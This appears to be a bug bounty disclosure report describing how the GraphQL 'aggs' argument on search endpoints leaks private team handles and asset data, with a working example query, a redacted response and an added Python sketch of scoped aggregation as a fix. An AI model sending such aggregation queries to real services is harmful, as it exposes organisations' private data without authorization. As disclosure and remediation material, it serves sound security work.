Summary:
Private information can be exposed using the aggs argument on the search and opportunities_search endpoints on the GraphQL root node.
Description:
When using the aggs argument and return field on the search and opportunities_search endpoints, the data returned in aggs can potentially contain private information. It can, for example, be used to expose handles of private programs, and other data that can be aggregated on.
The following is a specific example that exposes private team handles, but other things can be exposed in the same way using this or other indexes on the search endpoint.

    # Write your query or mutation here
    query {
      me {
        id
      }
      opportunities_search(query:{}, aggs:{results:{terms: {field:"handle"}}}) {
        aggs
      }
    }

handle which are not filtered on whether they are private or not.

    {
      "data": {
        "me": null,
        "opportunities_search": {
          "aggs": {
            "results": {
              "doc_count_error_upper_bound": 0,
              "sum_other_doc_count": 37,
              "buckets": [
                {
                  "key": "private",
                  "doc_count": 1
                },
                {
                  "key": "private",
                  "doc_count": 1
                },
                {
                  "key": "private",
                  "doc_count": 1
                },
                {
                  "key": "private",
                  "doc_count": 1
                },
                {
                  "key": "private",
                  "doc_count": 1
                },
                {
                  "key": "private",
                  "doc_count": 1
                },
                {
                  "key": "private",
                  "doc_count": 1
                },
                {
                  "key": "private",
                  "doc_count": 1
                },
                {
                  "key": "private",
                  "doc_count": 1
                },
                {
                  "key": "private",
                  "doc_count": 1
                }
              ]
            }
          }
        }
      }
    }

Impact depends on what information is stored in which index, and which fields can be aggregated on. In the current situation, it at least allows exposing asset information, handles and other information of teams you don't have access to.
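
The class of flaw described above, shown as an added example (not code from the report or from the affected application): a terms aggregation computed over the whole index next to one computed only over documents the viewer is authorized to see. The in-memory index, the `private` and `members` fields, the allowlist and all sample handles are constructed assumptions.

```python
from collections import Counter

# Constructed sample index; field names and values are hypothetical.
INDEX = [
    {"handle": "acme-public", "private": False, "members": set()},
    {"handle": "globex-private", "private": True, "members": {"alice"}},
    {"handle": "initech-private", "private": True, "members": {"bob"}},
]

# Fields a client may aggregate on (assumed allowlist).
AGGREGATABLE = {"handle"}


def visible_to(doc, viewer):
    """Same access rule that is applied to ordinary search hits."""
    return not doc["private"] or viewer in doc["members"]


def terms_buckets(docs, field):
    """Minimal stand-in for a terms aggregation: count docs per field value."""
    counts = Counter(doc[field] for doc in docs)
    return [{"key": k, "doc_count": n} for k, n in sorted(counts.items())]


def aggs_unscoped(viewer, aggs):
    """Flawed pattern: the aggregation runs over the whole index."""
    return {name: terms_buckets(INDEX, spec["terms"]["field"])
            for name, spec in aggs.items()}


def aggs_scoped(viewer, aggs):
    """Hardened pattern: authorize first, then aggregate over what is left."""
    allowed_docs = [d for d in INDEX if visible_to(d, viewer)]
    out = {}
    for name, spec in aggs.items():
        field = spec.get("terms", {}).get("field")
        # Accept only a plain terms aggregation on an allowlisted field.
        if set(spec) != {"terms"} or field not in AGGREGATABLE:
            raise PermissionError(f"aggregation {name!r} is not permitted")
        out[name] = terms_buckets(allowed_docs, field)
    return out
```

Passing `None` as the viewer models the unauthenticated caller seen in the response above, where `me` is `null`.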